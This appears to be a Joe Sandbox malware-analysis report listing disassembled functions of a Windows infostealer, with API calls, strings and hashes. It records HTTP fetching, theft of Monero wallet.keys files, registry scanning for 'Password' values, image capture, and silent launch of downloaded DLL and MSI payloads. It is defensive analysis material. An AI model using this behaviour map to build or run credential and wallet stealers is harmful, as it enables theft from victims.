Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 24e5b9ffbbd8da79dd9e114d0f79b3235ad9c1885af58660c4bb17f1c1353680
Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
Opcode Fuzzy Hash: 24e5b9ffbbd8da79dd9e114d0f79b3235ad9c1885af58660c4bb17f1c1353680
Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,00976668), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

FUA, xrefs: 004062E0, 0040656D, 0040652E, 0040646C, 004062E3
ERROR, xrefs: 00406457
ERROR, xrefs: 00406519
GET, xrefs: 004063CC

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$FUA$GET
API String ID: 3074848878-1334267432
Opcode ID: 8d2052ce6f56b34130f4bdb03eeee54b52a8e56d11ced9f3fa7599497f7be0a6
Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
Opcode Fuzzy Hash: 8d2052ce6f56b34130f4bdb03eeee54b52a8e56d11ced9f3fa7599497f7be0a6
Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

RegOpenKeyExA.KERNEL32(00000000,0096F1F8,00000000,00020019,00000000,004205BE), ref: 00418534
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Strings

?, xrefs: 0041850A
%s\%s, xrefs: 004185DD
- , xrefs: 00418733

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 548ba1065ab83f03c9bd26c1ca00f567c20da7874d0830e03175ae2cfaf9dfac
Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
Opcode Fuzzy Hash: 548ba1065ab83f03c9bd26c1ca00f567c20da7874d0830e03175ae2cfaf9dfac
Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9

Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC

Strings

`dAF, xrefs: 004191CF, 00419399, 004191D2, 0041939C
`dAF, xrefs: 00419361, 004193D9, 0041930E, 004192DF, 004192B2, 0041920D, 004191E4, 00419364
image/jpeg, xrefs: 004192C6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `dAF$`dAF$image/jpeg
API String ID: 2244384528-2462684518
Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
Sleep.KERNEL32(0000EA60), ref: 00415C6B

Strings

ERROR, xrefs: 004158E3
ERROR, xrefs: 00415B82
ERROR, xrefs: 004159CD
ERROR, xrefs: 00415886
ERROR, xrefs: 00415A99
ERROR, xrefs: 00415C4E

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 68fc1783be157d79b6a74cc1a14f4d38b2ed848e63635327db5cc2a9e1748814
Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
Opcode Fuzzy Hash: 68fc1783be157d79b6a74cc1a14f4d38b2ed848e63635327db5cc2a9e1748814
Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00413415
ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
ShellExecuteEx.SHELL32(0000003C), ref: 0041373A

Strings

/i ", xrefs: 00413634
"" , xrefs: 004132EA
C:\Windows\system32\rundll32.exe, xrefs: 00413582
C:\Windows\system32\msiexec.exe, xrefs: 0041370F
<, xrefs: 004136E0
/passive, xrefs: 004136AB
.dll, xrefs: 00413435
.msi, xrefs: 004135E8

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 2528a1684b23bf3401f9dbdbc6c17ea6bff926918c481d8853f80c72cb8d5a1d
Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
Opcode Fuzzy Hash: 2528a1684b23bf3401f9dbdbc6c17ea6bff926918c481d8853f80c72cb8d5a1d
Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

wallet_path, xrefs: 00401330
\Monero\wallet.keys, xrefs: 0040138D
SOFTWARE\monero-project\monero-core, xrefs: 00401335
.keys, xrefs: 0040136B

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 3c56a8906ad670cf43c6c9491f699d8d4edd2b242a0b193b6f3ff25cea90744c
Instruction ID: 8a875ffafc7cdb1f6750a56d7bf9635fee6f51bf8c43acc15b4905507f63a119
Opcode Fuzzy Hash: 3c56a8906ad670cf43c6c9491f699d8d4edd2b242a0b193b6f3ff25cea90744c
Instruction Fuzzy Hash: 915153B1E5011857CB14EB60DD96BED733D9F54304F4045EEB60A62092EE346BD8CAAE

Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407330: memset.MSVCRT ref: 00407374
Part of subcall function 00407330: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

lstrcatA.KERNEL32(210DE020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
lstrcatA.KERNEL32(210DE020,00000000,00000000), ref: 004076A8
lstrcatA.KERNEL32(210DE020, : ), ref: 004076BA
lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 004076EF
lstrcatA.KERNEL32(210DE020,00421934), ref: 00407700
lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 00407733
lstrcatA.KERNEL32(210DE020,00421938), ref: 0040774D
task.LIBCPMTD ref: 0040775B

Strings

: , xrefs: 004076AE

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96

Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407374
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 004075B5

Strings

Password, xrefs: 00407461

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95

Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
HeapAlloc.KERNEL32(00000000), ref: 0041779A
wsprintfA.USER32 ref: 004177D0

